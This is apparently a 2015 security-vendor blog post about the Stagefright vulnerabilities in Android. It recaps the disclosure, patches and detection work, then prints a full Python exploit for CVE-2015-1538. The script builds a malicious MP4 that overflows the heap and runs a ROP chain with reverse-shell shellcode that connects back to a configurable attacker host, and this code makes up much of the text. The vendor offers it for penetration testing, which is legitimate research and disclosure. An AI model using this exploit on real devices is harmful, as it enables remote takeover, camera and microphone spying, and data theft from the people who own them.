The Latest on Stagefright: CVE-2015-1538 Exploit is Now Available for Testing Purposes

More than a month has passed since Zimperium first broke the news of zLabs’ VP of Platform Research and Exploitation Joshua J. Drake’s discovery of multiple critical vulnerabilities in Android’s media library – libstagefright. In that time frame, the number and importance of the events that have unfolded is nothing short of amazing. Back in April and May we reported two sets of vulnerabilities to Google, both including multiple with critical severity. In July, we announced our intentions to publish our exploit on August 5th during Black Hat USA. After discussions with ZHA Partners, including both carriers and device manufacturers, we agreed to postpone the release of the exploit until August 24th. Multiple researchers have publicly discussed their own working exploits targeting vulnerabilities within libstagefright. Before we dive into our exploit, let’s recap the key events that unfolded since our recent announcement.

Black Hat Slides and Video Available

We made Joshua’s presentation slides available shortly after Black Hat and DEF CON. Later, the Black Hat organizers made the full video available on YouTube. Please review these materials to learn more about Joshua’s research straight from the source.

Unassisted Remote Attack Vector Addressed

Google released new versions of Hangouts and Messenger to block automatic processing of multimedia files arriving via MMS. We’ve tested these updated versions and are happy to confirm they prevent unassisted remote exploitation. However, this attack vector constituted only the worst of more than 10 different ways (browsers, instant messengers, etc) potentially malicious media is processed by the Stagefright library. With these other vectors still present, the importance of fixing issues within the code base remains very high.

Additional Vulnerabilities Reported

We expected other researchers to explore the vulnerabilities we disclosed and discover additional vulnerabilities in the Stagefright library over time. That said, we did not expect the incredible level of response from the community. We applaud the efforts of myriad researchers that flocked to audit the Android code base and collectively discovered and reported numerous additional issues.

Update Changes and Status

The most positive thing about our Stagefright research is waking the ecosystem and getting device vendors and carriers to realize they must distribute updates more quickly and more often. Industry leading vendors clearly stated that they intend to provide security updates on a monthly basis. Now that we are facing additional vulnerabilities, we’ll see for ourselves if our devices get these updates or not. In the meantime, updates addressing the initial set of issues we disclosed continue to roll out to affected devices.

Additional Update is Required

Shortly after the events in Las Vegas, researchers from Exodus Intelligence discovered a problem with one of the patches Joshua supplied. Google quickly analyzed this issue, assigned CVE-2015-3864, and pushed a fix to AOSP. We expect the fix to be included in the next round of official updates. In fact, our Stagefright Detector app data shows that some devices have received an update for this issue already. Regardless, we feel this issue represents a significant risk to the ecosystem and thus should be addressed sooner rather than later.

Our Detection Efforts

In order to best serve the mobile ecosystem, we created the Stagefright Detector app to detect if your device is vulnerable to the vulnerabilities discovered in libstagefright. After CVE-2015-3864 was publicly disclosed, we added it to the set of vulnerabilities tested in the app. Since then, we have been working directly with Google to port the app’s detection logic into Android’s Compatibility Test Suite (CTS). This means future versions of Android for all “Android Compatible” devices must have these issues fixed before they can ship.

Zimperium’s z9 enterprise customers, have the capability to detect attacks exploiting Stagefright vulnerabilities. Two demo videos are referenced below: one showing a successful attack, and another showing the attack being detected.

Researchers are Working on their Exploits

On August 25th, we discovered a researcher’s post on Twitter about his independent implementation of an exploit against libstagefright. His post shows his exploit works against Android 5.0 running in the emulator. This is consistent with information that a student and independent researcher posted on Twitter stating he had managed to bypass ASLR using an information leakage vulnerability in Stagefright. In the event additional public exploits surface, please exercise caution before running them, as they may contain backdoors.

Releasing Our Exploit for Testing Purposes

During the months of June and July, Joshua J. Drake developed a working exploit to prove the Stagefright vulnerability can allow Remote Code Execution (RCE) without user interaction. We are pleased to finally make this code available to the general public so that security teams, administrators, and penetration testers alike may test whether or not systems remain vulnerable.

What follows is a python script that generates an MP4 exploiting the ‘stsc’ vulnerability otherwise known as CVE-2015-1538 (#1). This is one of the most critical vulnerabilities we reported in the Stagefright library. The expected result of the exploit is a reverse shell as the media user. As detailed in Joshua Drake’s Black Hat and DEFCON presentations, this user has access to quite a few groups such as inet, audio, camera, and mediadrm. These groups allow an attacker to take pictures or listen to the microphone remotely without exploiting additional vulnerabilities.

This exploit has several caveats. First, it is not a generic exploit. We only tested it to work on a single device model. We tested this exploit on a Nexus running Android 4.0.4. Also, due to variances in heap layout, this is not a 100% reliable exploit by itself. We were able achieve 100% reliability when delivered through an attack vector that allowed multiple attempts. Finally, this vulnerability was one of several that was neutered by GCC 5.0’s ‘new[]’ integer overflow mitigation present on Android 5.0 and later.

Stagefright_CVE-2015-1538-1_Exploit.py (raw file)

#!/usr/bin/env python

# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs

# Shout outs to our friends at Optiv (formerly Accuvant Labs)

# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015

# www.zimperium.com

#

# Exploit for RCE Vulnerability CVE-2015-1538 #1

# Integer Overflow in the libstagefright MP4 ‘stsc’ atom handling

#

# Don’t forget, the output of “create_mp4” can be delivered many ways!

# MMS is the most dangerous attack vector, but not the only one…

#

# DISCLAIMER: This exploit is for testing and educational purposes only. Any

# other usage for this code is not allowed. Use at your own risk.

#

# “With great power comes great responsibility.” – Uncle Ben

#

import struct

import socket

#

# Creates a single MP4 atom – LEN, TAG, DATA

#

def make_chunk(tag, data):

if len(tag) != 4:

raise ‘Yo! They call it “FourCC” for a reason.’

ret = struct.pack(‘>L’, len(data) + 8)

ret += tag

ret += data

return ret

#

# Make an ‘stco’ atom – Sample Table Chunk Offets

#

def make_stco(extra=”):

ret = struct.pack(‘>L’, 0) # version

ret += struct.pack(‘>L’, 0) # mNumChunkOffsets

return make_chunk(‘stco’, ret+extra)

#

# Make an ‘stsz’ atom – Sample Table Size

#

def make_stsz(extra=”):

ret = struct.pack(‘>L’, 0) # version

ret += struct.pack(‘>L’, 0) # mDefaultSampleSize

ret += struct.pack(‘>L’, 0) # mNumSampleSizes

return make_chunk(‘stsz’, ret+extra)

#

# Make an ‘stts’ atom – Sample Table Time-to-Sample

#

def make_stts():

ret = struct.pack(‘>L’, 0) # version

ret += struct.pack(‘>L’, 0) # mTimeToSampleCount

return make_chunk(‘stts’, ret)

#

# This creates a single Sample Table Sample-to-Chunk entry

#

def make_stsc_entry(start, per, desc):

ret = ”

ret += struct.pack(‘>L’, start + 1)

ret += struct.pack(‘>L’, per)

ret += struct.pack(‘>L’, desc)

return ret

#

# Make an ‘stsc’ chunk – Sample Table Sample-to-Chunk

#

# If the caller desires, we will attempt to trigger (CVE-2015-1538 #1) and

# cause a heap overflow.

#

def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False):

ret = struct.pack(‘>L’, 0) # version/flags

# this is the clean version…

if not do_overflow:

ret += struct.pack(‘>L’, num_alloc) # mNumSampleToChunkOffsets

ret += ‘Z’ * (12 * num_alloc)

return make_chunk(‘stsc’, ret)

# now the explicit version. (trigger the bug)

ret += struct.pack(‘>L’, 0xc0000000 + num_alloc) # mNumSampleToChunkOffsets

# fill in the entries that will overflow the buffer

for x in range(0, num_write):

ret += make_stsc_entry(sp_addr, sp_addr, sp_addr)

ret = make_chunk(‘stsc’, ret)

# patch the data_size

ret = struct.pack(‘>L’, 8 + 8 + (num_alloc * 12)) + ret[4:]

return ret

#

# Build the ROP chain

#

# ROP pivot by Georg Wicherski! Thanks!

#

“””

(gdb) x/10i __dl_restore_core_regs

0xb0002850 <__dl_restore_core_regs>: add r1, r0, #52 ; 0x34

0xb0002854 <__dl_restore_core_regs+4>: ldm r1, {r3, r4, r5}

0xb0002858 <__dl_restore_core_regs+8>: push {r3, r4, r5}

0xb000285c <__dl_restore_core_regs+12>: ldm r0, {r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11}

0xb0002860 <__dl_restore_core_regs+16>: ldm sp, {sp, lr, pc}

“””

“””

b0001144 <__dl_mprotect>:

b0001144: e92d0090 push {r4, r7}

b0001148: e3a0707d mov r7, #125 ; 0x7d

b000114c: ef000000 svc 0x00000000

b0001150: e8bd0090 pop {r4, r7}

b0001154: e1b00000 movs r0, r0

b0001158: 512fff1e bxpl lr

b000115c: ea0015cc b b0006894 <__dl_raise+0x10>

“””

def build_rop(off, sp_addr, newpc_val, cb_host, cb_port):

rop = ”

rop += struct.pack(‘<L’, sp_addr + off + 0x10) # new sp

rop += struct.pack(‘<L’, 0xb0002a98) # new lr – pop {pc}

rop += struct.pack(‘<L’, 0xb00038b2+1) # new pc: pop {r0, r1, r2, r3, r4, pc}

rop += struct.pack(‘<L’, sp_addr & 0xfffff000) # new r0 – base address (page aligned)

rop += struct.pack(‘<L’, 0x1000) # new r1 – length

rop += struct.pack(‘<L’, 7) # new r2 – protection

rop += struct.pack(‘<L’, 0xd000d003) # new r3 – scratch

rop += struct.pack(‘<L’, 0xd000d004) # new r4 – scratch

rop += struct.pack(‘<L’, 0xb0001144) # new pc – _dl_mprotect

native_start = sp_addr + 0x80

rop += struct.pack(‘<L’, native_start) # address of native payload

#rop += struct.pack(‘<L’, 0xfeedfed5) # top of stack…

# linux/armle/shell_reverse_tcp (modified to pass env and fork/exit)

buf = ”

# fork

buf += ‘\x02\x70\xa0\xe3’

buf += ‘\x00\x00\x00\xef’

# continue if not parent…

buf += ‘\x00\x00\x50\xe3’

buf += ‘\x02\x00\x00\x0a’

# exit parent

buf += ‘\x00\x00\xa0\xe3’

buf += ‘\x01\x70\xa0\xe3’

buf += ‘\x00\x00\x00\xef’

# setsid in child

buf += ‘\x42\x70\xa0\xe3’

buf += ‘\x00\x00\x00\xef’

# socket/connect/dup2/dup2/dup2

buf += ‘\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x05\x20\x81\xe2\x8c’

buf += ‘\x70\xa0\xe3\x8d\x70\x87\xe2\x00\x00\x00\xef\x00\x60’

buf += ‘\xa0\xe1\x6c\x10\x8f\xe2\x10\x20\xa0\xe3\x8d\x70\xa0’

buf += ‘\xe3\x8e\x70\x87\xe2\x00\x00\x00\xef\x06\x00\xa0\xe1’

buf += ‘\x00\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x06’

buf += ‘\x00\xa0\xe1\x01\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00’

buf += ‘\x00\xef\x06\x00\xa0\xe1\x02\x10\xa0\xe3\x3f\x70\xa0’

buf += ‘\xe3\x00\x00\x00\xef’

# execve(shell, argv, env)

buf += ‘\x30\x00\x8f\xe2\x04\x40\x24\xe0’

buf += ‘\x10\x00\x2d\xe9\x38\x30\x8f\xe2\x08\x00\x2d\xe9\x0d’

buf += ‘\x20\xa0\xe1\x10\x00\x2d\xe9\x24\x40\x8f\xe2\x10\x00’

buf += ‘\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00’

buf += ‘\xef\x02\x00’

# Add the connect back host/port

buf += struct.pack(‘!H’, cb_port)

cb_host = socket.inet_aton(cb_host)

buf += struct.pack(‘=4s’, cb_host)

# shell –

buf += ‘/system/bin/sh\x00\x00’

# argv –

buf += ‘sh\x00\x00’

# env –

buf += ‘PATH=/sbin:/vendor/bin:/system/sbin:/system/bin:/system/xbin\x00’

# Add some identifiable stuff, just in case something goes awry…

rop_start_off = 0x34

x = rop_start_off + len(rop)

while len(rop) < 0x80 – rop_start_off:

rop += struct.pack(‘<L’, 0xf0f00000+x)

x += 4

# Add the native payload…

rop += buf

return rop

#

# Build an mp4 that exploits CVE-2015-1538 #1

#

# We mimic meow.3gp here…

#

def create_mp4(sp_addr, newpc_val, cb_host, cb_port):

chunks = []

# Build the MP4 header…

ftyp = ‘mp42’

ftyp += struct.pack(‘>L’, 0)

ftyp += ‘mp42’

ftyp += ‘isom’

chunks.append(make_chunk(‘ftyp’, ftyp))

# Note, this causes a few allocations…

moov_data = ”

moov_data += make_chunk(‘mvhd’,

struct.pack(‘>LL’, 0, 0x41414141) +

(‘B’ * 0x5c) )

# Add a minimal, verified trak to satisfy mLastTrack being set

moov_data += make_chunk(‘trak’,

make_chunk(‘stbl’,

make_stsc(0x28, 0x28) +

make_stco() +

make_stsz() +

make_stts() ))

# Spray the heap using a large tx3g chunk (can contain binary data!)

“””

0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs

0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0

0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1

0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4

0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement

0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1

0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>

0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase

0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr

0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address

0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6

0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!

“””

page = ”

off = 0 # the offset to the next object

off += 8

page += struct.pack(‘<L’, sp_addr + 8 + 16 + 8 + 12 – 28) # _vptr.RefBase (for when we smash mDataSource)

page += struct.pack(‘<L’, sp_addr + off) # mRefs

off += 16

page += struct.pack(‘<L’, 1) # mStrong

page += struct.pack(‘<L’, 0xc0dedbad) # mWeak

page += struct.pack(‘<L’, sp_addr + off) # mBase

page += struct.pack(‘<L’, 16) # mFlags (dont set OBJECT_LIFETIME_MASK)

off += 8

page += struct.pack(‘<L’, sp_addr + off) # the mBase _vptr.RefBase

page += struct.pack(‘<L’, 0xf00dbabe) # mBase.mRefs (unused)

off += 16

page += struct.pack(‘<L’, 0xc0de0000 + 0x00) # vtable entry 0

page += struct.pack(‘<L’, 0xc0de0000 + 0x04) # vtable entry 4

page += struct.pack(‘<L’, 0xc0de0000 + 0x08) # vtable entry 8

page += struct.pack(‘<L’, newpc_val) # vtable entry 12

rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)

x = len(page)

while len(page) < 4096:

page += struct.pack(‘<L’, 0xf0f00000+x)

x += 4

off = 0x34

page = page[:off] + rop + page[off+len(rop):]

spray = page * (((2*1024*1024) / len(page)) – 20)

moov_data += make_chunk(‘tx3g’, spray)

block = ‘A’ * 0x1c

bigger = ‘B’ * 0x40

udta = make_chunk(‘udta’,

make_chunk(‘meta’,

struct.pack(‘>L’, 0) +

make_chunk(‘ilst’,

make_chunk(‘cpil’, make_chunk(‘data’, struct.pack(‘>LL’, 21, 0) + ‘A’)) +

make_chunk(‘trkn’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABBBB’)) +

make_chunk(‘disk’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + ‘AAAABB’)) +

make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +

make_chunk(‘\xa9alb’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘aART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘\xa9nam’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) +

make_chunk(‘gnre’, make_chunk(‘data’, struct.pack(‘>LL’, 1, 0) + block)) +

make_chunk(‘covr’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + block)) * 32 +

make_chunk(‘\xa9ART’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +

make_chunk(‘\xa9wrt’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)) +

make_chunk(‘\xa9day’, make_chunk(‘data’, struct.pack(‘>LL’, 0, 0) + bigger)))

)

)

moov_data += udta

# Make the nasty trak

tkhd1 = ”.join([

‘\x00’, # version

‘D’ * 3, # padding

‘E’ * (5*4), # {c,m}time, id, ??, duration

‘F’ * 0x10, # ??

struct.pack(‘>LLLLLL’,

0x10000, # a00

0, # a01

0, # dx

0, # a10

0x10000, # a11

0), # dy

‘G’ * 0x14

])

trak1 = ”

trak1 += make_chunk(‘tkhd’, tkhd1)

mdhd1 = ”.join([

‘\x00’, # version

‘D’ * 0x17, # padding

])

mdia1 = ”

mdia1 += make_chunk(‘mdhd’, mdhd1)

mdia1 += make_chunk(‘hdlr’, ‘F’ * 0x3a)

dinf1 = ”

dinf1 += make_chunk(‘dref’, ‘H’ * 0x14)

minf1 = ”

minf1 += make_chunk(‘smhd’, ‘G’ * 0x08)

minf1 += make_chunk(‘dinf’, dinf1)

# Build the nasty sample table to trigger the vulnerability here.

stbl1 = make_stsc(3, (0x1200 / 0xc) – 1, sp_addr, True) # TRIGGER

# Add the stbl to the minf chunk

minf1 += make_chunk(‘stbl’, stbl1)

# Add the minf to the mdia chunk

mdia1 += make_chunk(‘minf’, minf1)

# Add the mdia to the track

trak1 += make_chunk(‘mdia’, mdia1)

# Add the nasty track to the moov data

moov_data += make_chunk(‘trak’, trak1)

# Finalize the moov chunk

moov = make_chunk(‘moov’, moov_data)

chunks.append(moov)

# Combine outer chunks together and voila.

data = ”.join(chunks)

return data

if __name__ == ‘__main__’:

import sys

import mp4

import argparse

def write_file(path, content):

with open(path, ‘wb’) as f:

f.write(content)

def addr(sval):

if sval.startswith(‘0x’):

return int(sval, 16)

return int(sval)

# The address of a fake StrongPointer object (sprayed)

sp_addr = 0x41d00010 # takju @ imm76i – 2MB (via hangouts)

# The address to of our ROP pivot

newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs

# Allow the user to override parameters

parser = argparse.ArgumentParser()

parser.add_argument(‘-c’, ‘–connectback-host’, dest=’cbhost’, default=’31.3.3.7′)

parser.add_argument(‘-p’, ‘–connectback-port’, dest=’cbport’, type=int, default=12345)

parser.add_argument(‘-s’, ‘–spray-address’, dest=’spray_addr’, type=addr, default=None)

parser.add_argument(‘-r’, ‘–rop-pivot’, dest=’rop_pivot’, type=addr, default=None)

parser.add_argument(‘-o’, ‘–output-file’, dest=’output_file’, default=’cve-2015-1538-1.mp4′)

args = parser.parse_args()

if len(sys.argv) == 1:

parser.print_help()

sys.exit(-1)

if args.spray_addr == None:

args.spray_addr = sp_addr

if args.rop_pivot == None:

args.rop_pivot = newpc_val

# Build the MP4 file…

data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)

print(‘[*] Saving crafted MP4 to %s …’ % args.output_file)

write_file(args.output_file, data)

Acknowledgements

We would like to thank Google, Samsung, LG, Motorola, Sony, HTC as well as other vendors and partners of ZHA for their cooperation prioritizing vulnerabilities in the Stagefright library in their updates:

CVE-2015-1538 CVE-2015-1538 #1 CVE-2015-1538 #2 CVE-2015-1538 #3 CVE-2015-1538 #4

CVE-2015-1539

CVE-2015-3824

CVE-2015-3826

CVE-2015-3827

CVE-2015-3828

CVE-2015-3829

CVE-2015-3864

We encourage vendors who still did not provide comprehensive device updates to address Stagefright issues to do so ASAP.

References

You can find more information on our work regarding vulnerabilities in the Stagefright library below:

Posts

Stagefright Initial Vulnerability Disclosure, CVE Details and impact – https://blog.zimperium.com/experts-found-a-unicorn-in-the-heart-of-android/

How to disable auto-fetching of MMS https://blog.zimperium.com/how-to-protect-from-stagefright-vulnerability/

Zimperium Handset Alliance for Carriers and Device Vendors – https://blog.zimperium.com/zha-zimperiums-initiative-to-fill-the-gaps-in-android-security/

Vulnerability Details, Patches, POC files: https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/

Updates for Stagefright Issues: https://blog.zimperium.com/zha-to-work-with-carriers-and-vendors-to-roll-out-updates/

Videos

Joshua’s Presentation at Black Hat USA: https://www.youtube.com/watch?v=71YP65UANP0

Stagefright Exploit Demonstration with Zimperium zIPS detection: https://www.youtube.com/watch?v=7S-11k28324

Stagefright Exploit Demonstration on Android 4.0.4 without user interaction: https://www.youtube.com/watch?v=PxQc5gOHnKs

Follow us on Twitter for more updates.